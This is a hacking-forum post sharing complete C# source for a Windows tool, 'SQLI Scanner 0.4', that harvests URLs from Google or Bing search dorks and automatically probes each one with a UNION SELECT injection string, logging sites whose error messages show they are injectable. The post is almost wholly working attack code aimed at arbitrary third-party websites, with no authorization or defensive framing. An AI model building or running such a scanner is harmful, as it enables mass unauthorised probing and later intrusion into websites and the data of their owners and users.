Inicio
Buscar
Ingresar
Registrarse
Starfield: el juego que revolucionará el espacio y la tecnología
Hack x Crack - Comunidad de Seguridad informática
»
Programación
»
Otros
»
[C#] SQLI Scanner 0.4
Imprimir
Páginas: [
1
]
Ir Abajo
Autor
Tema: [C#] SQLI Scanner 0.4 (Leído 3299 veces)
BigBear
{ L5 } Smurf
Mensajes: 594
[C#] SQLI Scanner 0.4
«
en:
Julio 18, 2014, 01:36:42 am »
Un simple programa en C# para buscar paginas vulnerables a SQLI usando Google o Bing.
Una imagen :
Los codigos :
Form1.cs
Código: C#
// SQLI Scanner 0.4
// (C) Doddy Hackman 2014
using
System
;
using
System.Collections.Generic
;
using
System.ComponentModel
;
using
System.Data
;
using
System.Drawing
;
using
System.Text
;
using
System.Windows.Forms
;
using
System.IO
;
using
System.Text.RegularExpressions
;
namespace
SQLI_Scanner
{
public
partial
class
Form1
:
Form
{
public
Form1
(
)
{
InitializeComponent
(
)
;
}
private
void
button1_Click
(
object
sender, EventArgs e
)
{
listBox1
.
Items
.
Clear
(
)
;
DH_Tools tools
=
new
DH_Tools
(
)
;
funciones funcion
=
new
funciones
(
)
;
toolStripStatusLabel1
.
Text
=
"[+] Searching ..."
;
this
.
Refresh
(
)
;
List
<
string
>
urls
=
new
List
<
string
>
{
}
;
if
(
comboBox1
.
Text
==
"Bing"
)
{
urls
=
funcion
.
bingsearch
(
textBox1
.
Text
, textBox2
.
Text
)
;
urls
=
tools
.
repes
(
tools
.
cortar
(
urls
)
)
;
}
else
{
urls
=
funcion
.
googlesearch
(
textBox1
.
Text
, textBox2
.
Text
)
;
urls
=
tools
.
repes
(
tools
.
cortar
(
urls
)
)
;
}
foreach
(
string
url
in
urls
)
{
listBox1
.
Items
.
Add
(
url
)
;
}
if
(
listBox1
.
Items
.
Count
==
0
)
{
MessageBox
.
Show
(
"Not Found"
)
;
}
toolStripStatusLabel1
.
Text
=
"[+] Search finished"
;
this
.
Refresh
(
)
;
}
private
void
button2_Click
(
object
sender, EventArgs e
)
{
toolStripStatusLabel1
.
Text
=
"[+] Scanning ..."
;
this
.
Refresh
(
)
;
listBox2
.
Items
.
Clear
(
)
;
DH_Tools tools
=
new
DH_Tools
(
)
;
String
url
=
""
;
String
code
=
""
;
List
<
string
>
urls_to_scan
=
new
List
<
string
>
{
}
;
foreach
(
object
write
in
listBox1
.
Items
)
{
urls_to_scan
.
Add
(
write
.
ToString
(
)
)
;
}
if
(
listBox1
.
Items
.
Count
==
0
)
{
MessageBox
.
Show
(
"Not Found"
)
;
}
else
{
foreach
(
string
page
in
urls_to_scan
)
{
toolStripStatusLabel1
.
Text
=
"[+] Checking : "
+
page
;
this
.
Refresh
(
)
;
code
=
tools
.
toma
(
page
+
"-1+union+select+666--"
)
;
Match regex
=
Regex
.
Match
(
code,
"The used SELECT statements have a different number of columns"
, RegexOptions
.
IgnoreCase
)
;
if
(
regex
.
Success
)
{
listBox2
.
Items
.
Add
(
page
)
;
tools
.
savefile
(
"sqli-logs.txt"
, page
)
;
}
}
if
(
listBox2
.
Items
.
Count
==
0
)
{
MessageBox
.
Show
(
"Not Found"
)
;
}
}
toolStripStatusLabel1
.
Text
=
"[+] Scan Finished"
;
this
.
Refresh
(
)
;
}
private
void
button3_Click
(
object
sender, EventArgs e
)
{
DH_Tools tools
=
new
DH_Tools
(
)
;
if
(
File
.
Exists
(
"sqli-logs.txt"
)
)
{
tools
.
console
(
"sqli-logs.txt"
)
;
}
else
{
MessageBox
.
Show
(
"Logs not found"
)
;
}
}
private
void
button4_Click
(
object
sender, EventArgs e
)
{
Application
.
Exit
(
)
;
}
private
void
listBox1_DoubleClick
(
object
sender, EventArgs e
)
{
DH_Tools tools
=
new
DH_Tools
(
)
;
tools
.
console
(
"start "
+
listBox1
.
SelectedItem
.
ToString
(
)
)
;
}
private
void
listBox2_DoubleClick
(
object
sender, EventArgs e
)
{
DH_Tools tools
=
new
DH_Tools
(
)
;
tools
.
console
(
"start "
+
listBox2
.
SelectedItem
.
ToString
(
)
)
;
}
}
}
// The End ?
funciones.cs
Código: C#
// Funciones para SQLI Scanner 0.4
// (C) Doddy Hackman 2014
using
System
;
using
System.Collections.Generic
;
using
System.Text
;
using
System.Net
;
using
System.Text.RegularExpressions
;
using
System.Web
;
namespace
SQLI_Scanner
{
class
funciones
{
public
List
<
String
>
bingsearch
(
string
dork,
string
cantidad
)
{
String
code
=
""
;
Int16 num
=
0
;
//String dork = "index.php+id";
//String cantidad = "20";
String
url_cortar
=
""
;
String
url_final
=
""
;
WebClient nave
=
new
WebClient
(
)
;
nave
.
Headers
[
"User-Agent"
]
=
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
;
List
<
string
>
urls
=
new
List
<
string
>
{
}
;
for
(
num
=
10
;
num
<=
Convert
.
ToInt16
(
cantidad
)
;
num
+=
10
)
{
code
=
nave
.
DownloadString
(
"http://www.bing.com/search?q="
+
dork
+
"&first="
+
num
)
;
Match regex1
=
Regex
.
Match
(
code,
"<h3><a href=
\"
(.*?)
\"
"
, RegexOptions
.
IgnoreCase
)
;
while
(
regex1
.
Success
)
{
url_cortar
=
regex1
.
Groups
[
1
]
.
Value
;
Match regex2
=
Regex
.
Match
(
url_cortar,
"(.*?)=(.*?)"
, RegexOptions
.
IgnoreCase
)
;
if
(
regex2
.
Success
)
{
url_final
=
regex2
.
Groups
[
1
]
.
Value
+
"="
;
urls
.
Add
(
url_final
)
;
}
regex1
=
regex1
.
NextMatch
(
)
;
}
}
return
urls
;
}
public
List
<
String
>
googlesearch
(
string
dork,
string
paginas
)
{
String
code
=
""
;
Int16 num
=
0
;
String
lineafinale
=
""
;
String
leer
=
""
;
WebClient nave
=
new
WebClient
(
)
;
nave
.
Headers
[
"User-Agent"
]
=
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
;
List
<
string
>
urlsgoogle
=
new
List
<
string
>
{
}
;
for
(
num
=
10
;
num
<=
Convert
.
ToInt16
(
paginas
)
;
num
+=
10
)
{
code
=
nave
.
DownloadString
(
"http://www.google.com/search?hl=&q="
+
dork
+
"&start="
+
num
)
;
Match regex
=
Regex
.
Match
(
code,
"(?<=
\"
r
\"
><. href=
\"
)(.+?)
\"
"
, RegexOptions
.
IgnoreCase
)
;
while
(
regex
.
Success
)
{
leer
=
Uri
.
UnescapeDataString
(
regex
.
Groups
[
1
]
.
Value
)
;
Match cortada
=
Regex
.
Match
(
leer,
@"\/url\?q\=(.*?)\&\;"
, RegexOptions
.
IgnoreCase
)
;
if
(
cortada
.
Success
)
{
lineafinale
=
cortada
.
Groups
[
1
]
.
Value
;
}
else
{
lineafinale
=
leer
;
}
urlsgoogle
.
Add
(
lineafinale
)
;
regex
=
regex
.
NextMatch
(
)
;
}
}
return
urlsgoogle
;
}
}
}
// The End ?
DH_Tools.cs
Código: C#
// Class Name : DH Tools
// Version : Beta
// Author : Doddy Hackman
// (C) Doddy Hackman 2014
//
// Functions :
//
// [+] HTTP Methods GET & POST
// [+] Get HTTP Status code number
// [+] HTTP FingerPrinting
// [+] Read File
// [+] Write File
// [+] GET OS
// [+] Remove duplicates from a List
// [+] Cut urls from a List
// [+] Download
// [+] Upload
// [+] Get Basename from a path
// [+] Execute commands
// [+] URI Split
// [+] MD5 Hash Generator
// [+] Get MD5 of file
// [+] Get IP address from host name
//
// Credits :
//
// Method POST -> https://technet.rapaport.com/Info/Prices/SampleCode/Full_Example.aspx
// Method GET -> http://stackoverflow.com/questions/4510212/how-i-can-get-web-pages-content-and-save-it-into-the-string-variable
// HTTP Headers -> http://msdn.microsoft.com/en-us/library/system.net.httpwebresponse.headers%28v=vs.110%29.aspx
// List Cleaner -> http://forums.asp.net/t/1318899.aspx?Remove+duplicate+items+from+List+String+
// Execute command -> http://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C
// MD5 Hash Generator -> http://www.java2s.com/Code/CSharp/Security/GetandverifyMD5Hash.htm
// Get MD5 of file -> http://stackoverflow.com/questions/10520048/calculate-md5-checksum-for-a-file
//
// Thanks to : $DoC and atheros14 (Forum indetectables)
//
using
System
;
using
System.Collections.Generic
;
using
System.Text
;
using
System.Net
;
using
System.IO
;
using
System.Text.RegularExpressions
;
using
System.Security.Cryptography
;
namespace
SQLI_Scanner
{
class
DH_Tools
{
public
string
toma
(
string
url
)
{
string
code
=
""
;
try
{
WebClient nave
=
new
WebClient
(
)
;
nave
.
Headers
[
"User-Agent"
]
=
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
;
code
=
nave
.
DownloadString
(
url
)
;
}
catch
{
//
}
return
code
;
}
public
string
tomar
(
string
url,
string
par
)
{
string
code
=
""
;
try
{
HttpWebRequest nave
=
(
HttpWebRequest
)
WebRequest
.
Create
(
url
)
;
nave
.
UserAgent
=
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
;
nave
.
Method
=
"POST"
;
nave
.
ContentType
=
"application/x-www-form-urlencoded"
;
Stream anteantecode
=
nave
.
GetRequestStream
(
)
;
anteantecode
.
Write
(
Encoding
.
ASCII
.
GetBytes
(
par
)
,
0
, Encoding
.
ASCII
.
GetBytes
(
par
)
.
Length
)
;
anteantecode
.
Close
(
)
;
StreamReader antecode
=
new
StreamReader
(
nave
.
GetResponse
(
)
.
GetResponseStream
(
)
)
;
code
=
antecode
.
ReadToEnd
(
)
;
}
catch
{
//
}
return
code
;
}
public
string
respondecode
(
string
url
)
{
String
code
=
""
;
try
{
HttpWebRequest nave
=
(
HttpWebRequest
)
WebRequest
.
Create
(
url
)
;
nave
.
UserAgent
=
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
;
HttpWebResponse num
=
(
HttpWebResponse
)
nave
.
GetResponse
(
)
;
int
number
=
(
int
)
num
.
StatusCode
;
code
=
Convert
.
ToString
(
number
)
;
}
catch
{
code
=
"404"
;
}
return
code
;
}
public
string
httpfinger
(
string
url
)
{
String
code
=
""
;
try
{
HttpWebRequest nave1
=
(
HttpWebRequest
)
WebRequest
.
Create
(
url
)
;
HttpWebResponse nave2
=
(
HttpWebResponse
)
nave1
.
GetResponse
(
)
;
for
(
int
num
=
0
;
num
<
nave2
.
Headers
.
Count
;
++
num
)
{
code
=
code
+
"[+] "
+
nave2
.
Headers
.
Keys
[
num
]
+
":"
+
nave2
.
Headers
[
num
]
+
Environment
.
NewLine
;
}
nave2
.
Close
(
)
;
}
catch
{
//
}
return
code
;
}
public
string
openword
(
string
file
)
{
String
code
=
""
;
try
{
code
=
System.
IO
.
File
.
ReadAllText
(
file
)
;
}
catch
{
//
}
return
code
;
}
public
void
savefile
(
string
file,
string
texto
)
{
try
{
System.
IO
.
StreamWriter
save
=
new
System.
IO
.
StreamWriter
(
file,
true
)
;
save
.
Write
(
texto
)
;
save
.
Close
(
)
;
}
catch
{
//
}
}
public
string
getos
(
)
{
string
code
=
""
;
try
{
System
.
OperatingSystem
os
=
System
.
Environment
.
OSVersion
;
code
=
Convert
.
ToString
(
os
)
;
}
catch
{
code
=
"?"
;
}
return
code
;
}
public
List
<
string
>
repes
(
List
<
string
>
array
)
{
List
<
string
>
repe
=
new
List
<
string
>
(
)
;
foreach
(
string
lin
in
array
)
{
if
(
!
repe
.
Contains
(
lin
)
)
{
repe
.
Add
(
lin
)
;
}
}
return
repe
;
}
public
List
<
string
>
cortar
(
List
<
string
>
otroarray
)
{
List
<
string
>
cort
=
new
List
<
string
>
(
)
;
foreach
(
string
row
in
otroarray
)
{
String
lineafinal
=
""
;
Match regex
=
Regex
.
Match
(
row,
@"(.*)\?(.*)=(.*)"
, RegexOptions
.
IgnoreCase
)
;
if
(
regex
.
Success
)
{
lineafinal
=
regex
.
Groups
[
1
]
.
Value
+
"?"
+
regex
.
Groups
[
2
]
.
Value
+
"="
;
cort
.
Add
(
lineafinal
)
;
}
}
return
cort
;
}
public
string
download
(
string
url,
string
savename
)
{
String
code
=
""
;
WebClient nave
=
new
WebClient
(
)
;
nave
.
Headers
[
"User-Agent"
]
=
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
;
try
{
nave
.
DownloadFile
(
url, savename
)
;
code
=
"OK"
;
}
catch
{
code
=
"Error"
;
}
return
code
;
}
public
string
upload
(
string
link,
string
archivo
)
{
String
code
=
""
;
try
{
WebClient nave
=
new
WebClient
(
)
;
nave
.
Headers
[
"User-Agent"
]
=
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
;
byte
[
]
codedos
=
nave
.
UploadFile
(
link,
"POST"
, archivo
)
;
code
=
System.
Text
.
Encoding
.
UTF8
.
GetString
(
codedos,
0
, codedos
.
Length
)
;
}
catch
{
code
=
"Error"
;
}
return
code
;
}
public
string
basename
(
string
file
)
{
String
nombre
=
""
;
FileInfo basename
=
new
FileInfo
(
file
)
;
nombre
=
basename
.
Name
;
return
nombre
;
}
public
string
console
(
string
cmd
)
{
string
code
=
""
;
try
{
System.
Diagnostics
.
ProcessStartInfo
loadnow
=
new
System.
Diagnostics
.
ProcessStartInfo
(
"cmd"
,
"/c "
+
cmd
)
;
loadnow
.
RedirectStandardOutput
=
true
;
loadnow
.
UseShellExecute
=
false
;
loadnow
.
CreateNoWindow
=
true
;
System.
Diagnostics
.
Process
loadnownow
=
new
System.
Diagnostics
.
Process
(
)
;
loadnownow
.
StartInfo
=
loadnow
;
loadnownow
.
Start
(
)
;
code
=
loadnownow
.
StandardOutput
.
ReadToEnd
(
)
;
}
catch
{
code
=
"Error"
;
}
return
code
;
}
public
string
urisplit
(
string
url,
string
opcion
)
{
string
code
=
""
;
Uri dividir
=
new
Uri
(
url
)
;
if
(
opcion
==
"host"
)
{
code
=
dividir
.
Host
;
}
if
(
opcion
==
"port"
)
{
code
=
Convert
.
ToString
(
dividir
.
Port
)
;
}
if
(
opcion
==
"path"
)
{
code
=
dividir
.
LocalPath
;
}
if
(
opcion
==
"file"
)
{
code
=
dividir
.
AbsolutePath
;
FileInfo basename
=
new
FileInfo
(
code
)
;
code
=
basename
.
Name
;
}
if
(
opcion
==
"query"
)
{
code
=
dividir
.
Query
;
}
if
(
opcion
==
""
)
{
code
=
"Error"
;
}
return
code
;
}
public
string
convertir_md5
(
string
text
)
{
MD5 convertirmd5
=
MD5
.
Create
(
)
;
byte
[
]
infovalor
=
convertirmd5
.
ComputeHash
(
Encoding
.
Default
.
GetBytes
(
text
)
)
;
StringBuilder guardar
=
new
StringBuilder
(
)
;
for
(
int
numnow
=
0
;
numnow
<
infovalor
.
Length
;
numnow
++
)
{
guardar
.
Append
(
infovalor
[
numnow
]
.
ToString
(
"x2"
)
)
;
}
return
guardar
.
ToString
(
)
;
}
public
string
md5file
(
string
file
)
{
string
code
=
""
;
try
{
var
gen
=
MD5
.
Create
(
)
;
var
ar
=
File
.
OpenRead
(
file
)
;
code
=
BitConverter
.
ToString
(
gen
.
ComputeHash
(
ar
)
)
.
Replace
(
"-"
,
""
)
.
ToLower
(
)
;
}
catch
{
code
=
"Error"
;
}
return
code
;
}
public
string
getip
(
string
host
)
{
string
code
=
""
;
try
{
IPAddress
[
]
find
=
Dns
.
GetHostAddresses
(
host
)
;
code
=
find
[
0
]
.
ToString
(
)
;
}
catch
{
code
=
"Error"
;
}
return
code
;
}
}
}
// The End ?
Si lo quieren bajar lo pueden hacer de
aca
.
En línea
Imprimir
Páginas: [
1
]
Ir Arriba
Hack x Crack - Comunidad de Seguridad informática
»
Programación
»
Otros
»
[C#] SQLI Scanner 0.4
Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso...
OK
Learn more